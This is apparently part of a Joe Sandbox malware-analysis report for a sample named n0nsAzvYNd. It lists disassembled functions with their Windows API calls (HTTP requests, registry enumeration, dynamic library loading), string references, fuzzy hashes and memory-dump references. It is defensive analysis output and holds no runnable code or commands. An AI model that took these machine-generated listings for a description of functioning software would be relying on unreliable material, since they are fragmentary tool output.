Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 443a56ff8ee21cfb13e5585c671be01a26895fd3788b271808a5d3b041cfb1aa
Instruction ID: 8daaae8feaec9e75a39a375af26ab84fd68e7dc28ae9a0efde17598c848f7479
Opcode Fuzzy Hash: 443a56ff8ee21cfb13e5585c671be01a26895fd3788b271808a5d3b041cfb1aa
Instruction Fuzzy Hash: 3F51C3712083019EE7259F28CA49A6FB7E8EF45314F14093EF895E72D1DBB8DC44875A

Function 003B3137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 003B3277
_memmove.LIBCMT ref: 003B3310
_free.LIBCMT ref: 003B3336
_memmove.LIBCMT ref: 003B33E9

Strings

_;, xrefs: 003B3322
3c;, xrefs: 003B3225

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: _memmove$_free
String ID: 3c;$_;
API String ID: 2620147621-934490711
Opcode ID: 85429043f25301751c1f333e29d1d6430787759e77b7c8d136540c9d4ceefa20
Instruction ID: f9d1b9976994dabb867323144d83ce4758fdfe62069a2e907fcd7e538326ef88
Opcode Fuzzy Hash: 85429043f25301751c1f333e29d1d6430787759e77b7c8d136540c9d4ceefa20
Instruction Fuzzy Hash: 0B516D71A083518FDB26CF29C841BAABBE5EF85314F05492DE589C7351DB31ED01CB82

Function 003B6192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003B6248
_memmove.LIBCMT ref: 003B62E4
_memset.LIBCMT ref: 003B6308

Strings

ERCP, xrefs: 003B61B3
3c;, xrefs: 003B62AF

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: _memset$_memmove
String ID: 3c;$ERCP
API String ID: 2532777613-4245667014
Opcode ID: 17cb00d54d5e808987f457729e0b5e26ea50f8e9e08d732fbcbf759d9fb4bd8a
Instruction ID: 2d57f83a96c5996404c2669527e2652590e9f2ea8ac48a37796ad2aff9d1f3c0
Opcode Fuzzy Hash: 17cb00d54d5e808987f457729e0b5e26ea50f8e9e08d732fbcbf759d9fb4bd8a
Instruction Fuzzy Hash: 9B51B671900709DBDB25CF55C982BEAB7F8EF04304F20496EEA4ACB652E778E944CB40

Function 00402753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004027C0
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 004027DC
DeleteMenu.USER32(?,00000007,00000000), ref: 00402822
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00465890,00000000), ref: 0040286B

Strings

0, xrefs: 004027B5

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: a8cf2e2d13938bec1b2fe1f8b0970aa18e99c32bbb4d00d63c78a78122c40bb7
Instruction ID: 7d5dff13ab22f589876f1bc1f34e8de747d7b5da8a155145b743db9d07514cc0
Opcode Fuzzy Hash: a8cf2e2d13938bec1b2fe1f8b0970aa18e99c32bbb4d00d63c78a78122c40bb7
Instruction Fuzzy Hash: 9241CF762043019FD720EF25C988B1BBBE4EF85314F048A3EF965A72D1D7B4A905CB56

Function 0041D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0041D7C5

Part of subcall function 003A784B: _memmove.LIBCMT ref: 003A7899

Strings

winapi, xrefs: 0041D836
stdcall, xrefs: 0041D847
none, xrefs: 0041D8A0
cdecl, xrefs: 0041D81C

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 0656426f4ab63fe892e4cffaf6258047dd0b6871afd3d5ea2e1ee7a7f733a4e1
Instruction ID: 42e50099b76fbfde0f0c8ee9716bf730ebc10f9fbbd621d9c9ff2ef330dfb7f2
Opcode Fuzzy Hash: 0656426f4ab63fe892e4cffaf6258047dd0b6871afd3d5ea2e1ee7a7f733a4e1
Instruction Fuzzy Hash: 29318C71904219ABCF05EF58CC919EEB3B5FF05320B108A2AE8359B7D1DB75AD45CB84

Function 003F8E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 003A7DE1: _memmove.LIBCMT ref: 003A7E22

Part of subcall function 003FAA99: GetClassNameW.USER32(?,?,000000FF), ref: 003FAABC

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 003F8F14
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 003F8F27
SendMessageW.USER32(?,00000189,?,00000000), ref: 003F8F57

Part of subcall function 003A7BCC: _memmove.LIBCMT ref: 003A7C06

Strings

ListBox, xrefs: 003F8ED3
ComboBox, xrefs: 003F8E9E

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: 6c0bab0e8eea9ed27b164790999f78e9da9b171ea58c4a42e9793e71eda26255
Instruction ID: 64a949de7a0a4bba4422e90ac20a830456f56e64bbc6025787d7841be73dcd16
Opcode Fuzzy Hash: 6c0bab0e8eea9ed27b164790999f78e9da9b171ea58c4a42e9793e71eda26255
Instruction Fuzzy Hash: 4021E471A04208BEDB1AABB0DC89DFFB779DF06320B544529F9259B1E1DF39480E9620

Function 0041182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0041184C
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00411872
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 004118A2
InternetCloseHandle.WININET(00000000), ref: 004118E9

Part of subcall function 00412483: GetLastError.KERNEL32(?,?,00411817,00000000,00000000,00000001), ref: 00412498
Part of subcall function 00412483: SetEvent.KERNEL32(?,?,00411817,00000000,00000000,00000001), ref: 004124AD

Strings

, xrefs: 00411893

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: ad524a7b8af66b623f02075f90a07bf79354d08492037a0f362b672781e3bdc9
Instruction ID: 3d35d2d72786cf46ecc1ff669586c0b395ded1cb533c3125b2ae71dacb640d76
Opcode Fuzzy Hash: ad524a7b8af66b623f02075f90a07bf79354d08492037a0f362b672781e3bdc9
Instruction Fuzzy Hash: A621AFB1600208BFEB11AF658C85EFF77ADEB88744F10813BF505D6250DA688D4597A9

Function 004263E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 003A1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 003A1D73
Part of subcall function 003A1D35: GetStockObject.GDI32(00000011), ref: 003A1D87
Part of subcall function 003A1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 003A1D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00426461
LoadLibraryW.KERNEL32(?), ref: 00426468
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0042647D
DestroyWindow.USER32(?), ref: 00426485

Strings

SysAnimate32, xrefs: 0042643C

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: ab9598ca8d9536cceea6b11c062cf12aa99326d7de12d98f1dcdd1363d54fd3c
Instruction ID: 4fb1baec702876f4e8ef61f41ec2e5484df43d58ba5e9fc0d7005837e6f91ab2
Opcode Fuzzy Hash: ab9598ca8d9536cceea6b11c062cf12aa99326d7de12d98f1dcdd1363d54fd3c
Instruction Fuzzy Hash: 4021BE71300225ABEF109F64EC40EBB37A9EB48328F91462AF99492290D7799C42972C

Function 00406D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00406DBC
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00406DEF
GetStdHandle.KERNEL32(0000000C), ref: 00406E01
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00406E3B

Strings

nul, xrefs: 00406E36

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: fff1e4b16f723d0e5931de4a55983b2e16b5c93cf25a240fd0ec11db827517c6
Instruction ID: 137fdb5c894d0b8b4b17b0c467cdaba3a98ead6a52d0ae194e60d16d45d24d11
Opcode Fuzzy Hash: fff1e4b16f723d0e5931de4a55983b2e16b5c93cf25a240fd0ec11db827517c6
Instruction Fuzzy Hash: F721C47460030AABDB209F29DC05A9A77F4EF44720F21463AFCA2E73D0DB749865CB58

Function 00406E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00406E89
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00406EBB
GetStdHandle.KERNEL32(000000F6), ref: 00406ECC
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00406F06

Strings

nul, xrefs: 00406F01

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 6f751fc159abb00c55adcf8236365f3387771db191d5beba63d3311aba816b6f
Instruction ID: a5175bcd0e0094ed175daabe1800454b30abd20f4948256755e05d5a25ec6e0a
Opcode Fuzzy Hash: 6f751fc159abb00c55adcf8236365f3387771db191d5beba63d3311aba816b6f
Instruction Fuzzy Hash: 8521B5756003059BDB209F69DC04A5B77A4EF45720F210A3AFCA2E73D0D774986187A9

Function 0040AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0040AC54
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0040ACA8
__swprintf.LIBCMT ref: 0040ACC1
SetErrorMode.KERNEL32(00000000,00000001,00000000,0042F910), ref: 0040ACFF

Strings

%lu, xrefs: 0040ACBB

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: e60f1d554c9f7352f7474958cf9f88b6d7ccfad52e7be9491bacbe51d5a3d37c
Instruction ID: f340291e14501487272cd915a844019fa93c4bdf00e487f87835b8c76c49f15f
Opcode Fuzzy Hash: e60f1d554c9f7352f7474958cf9f88b6d7ccfad52e7be9491bacbe51d5a3d37c
Instruction Fuzzy Hash: 1F219030A00209AFCB10DF64C945EAE7BB8EF49314B40407AF909EB251DB31EA55CB21

Function 00401142 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,003FFCED,?,00400D40,?,00008000), ref: 0040115F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,003FFCED,?,00400D40,?,00008000), ref: 00401184
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,003FFCED,?,00400D40,?,00008000), ref: 0040118E
Sleep.KERNEL32(?,?,?,?,?,?,?,003FFCED,?,00400D40,?,00008000), ref: 004011C1

Strings

@@, xrefs: 0040119D

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID: @@
API String ID: 2875609808-1286171407
Opcode ID: 6ac35bfff62827a6c8b56e8ccc0dca4d86ce37ce7f64bb6e3b320d9523372945
Instruction ID: d2cacd827290df94a9c126bc9e621f5f2e2f53f38507c53148cd8d1868f8fc26
Opcode Fuzzy Hash: 6ac35bfff62827a6c8b56e8ccc0dca4d86ce37ce7f64bb6e3b320d9523372945
Instruction Fuzzy Hash: 0A117C31D1061CE7CF049FA4D848AEEBB78FF0D711F804076EA41BA290CB349961CB99

Function 00401AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00401B19

Strings

EXISTS, xrefs: 00401B41
KEYS, xrefs: 00401B30
REMOVE, xrefs: 00401B1F
APPEND, xrefs: 00401B52

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: f1bf66e40d11beddb369c632abfb3d98ddadbe93051def5f67fddf1cdff03eca
Instruction ID: ec84a26d6ff21b9b5ff070850c725c21fdff79e32db3bf8a10431f10763c7a9a
Opcode Fuzzy Hash: f1bf66e40d11beddb369c632abfb3d98ddadbe93051def5f67fddf1cdff03eca
Instruction Fuzzy Hash: F8113035D001589BCF04DF64D8519AEB7B4FF25308B50846AD814AB3A2EF366D0ACB54

Function 0041EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0041EC07
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0041EC37
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0041ED6A
CloseHandle.KERNEL32(?), ref: 0041EDEB

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 1b76ab5729e2da8de7378bdd66d15d2408652451598ff83343da0dbc0aa3a0f6
Instruction ID: 4cb0d8344943a92449b4701e1bae08976ef5fcd3670f7f13b9651e6cf7c332da
Opcode Fuzzy Hash: 1b76ab5729e2da8de7378bdd66d15d2408652451598ff83343da0dbc0aa3a0f6
Instruction Fuzzy Hash: DB81A1716003009FD721EF29C846F6AB7E5EF49710F44882EF999AB392DA74AC41CB55

Function 00420037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 003A7DE1: _memmove.LIBCMT ref: 003A7E22

Part of subcall function 00420E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0041FDAD,?,?), ref: 00420E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004200FD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0042013C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00420183
RegCloseKey.ADVAPI32(?,?), ref: 004201AF
RegCloseKey.ADVAPI32(00000000), ref: 004201BC

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 7486031d954339819ca9501206def502eda44f0ecfab16b2a5aaa0de00e05c10
Instruction ID: 4f555b24c4dd7e88414eebb9040166c2c44b33d4b9b21611699ac5b59c95ac27
Opcode Fuzzy Hash: 7486031d954339819ca9501206def502eda44f0ecfab16b2a5aaa0de00e05c10
Instruction Fuzzy Hash: 3A515831208204AFC715EF58D881F6BB7E9EF85304F80492EF5959B2A2DB35E905CB56

Function 0041D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 003A9837: __itow.LIBCMT ref: 003A9862
Part of subcall function 003A9837: __swprintf.LIBCMT ref: 003A98AC

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0041D927
GetProcAddress.KERNEL32(00000000,?), ref: 0041D9AA
GetProcAddress.KERNEL32(00000000,00000000), ref: 0041D9C6
GetProcAddress.KERNEL32(00000000,?), ref: 0041DA07
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0041DA21

Part of subcall function 003A5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00407896,?,?,00000000), ref: 003A5A2C
Part of subcall function 003A5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00407896,?,?,00000000,?,?), ref: 003A5A50

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 8acfe10c8f20e2dd1460125a03562ce50841117300aeda403675c5c72ab5c93f
Instruction ID: 47b9b364a0ba6ed3eecdc4709cd0ecff6094d25aecc2511111cc97a0803e5b4c
Opcode Fuzzy Hash: 8acfe10c8f20e2dd1460125a03562ce50841117300aeda403675c5c72ab5c93f
Instruction Fuzzy Hash: FD5129B5A00209DFCB01EFA8C4849AEB7F4FF09310B44816AE855AB312D735ED86CF95

Function 0040E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0040E61F
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0040E648
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0040E687

Part of subcall function 003A9837: __itow.LIBCMT ref: 003A9862
Part of subcall function 003A9837: __swprintf.LIBCMT ref: 003A98AC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0040E6AC
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0040E6B4

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: fd6f4d8c259556421ff74c9ed3f798fd2cd2bee45483aeb8942dfe7188cd8a83
